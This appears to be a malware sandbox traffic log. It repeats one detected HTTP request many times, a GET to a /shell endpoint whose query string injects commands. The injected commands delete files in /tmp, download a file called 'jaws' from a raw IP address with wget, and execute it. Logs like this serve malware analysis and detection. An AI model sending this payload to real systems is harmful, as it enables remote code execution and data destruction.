          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
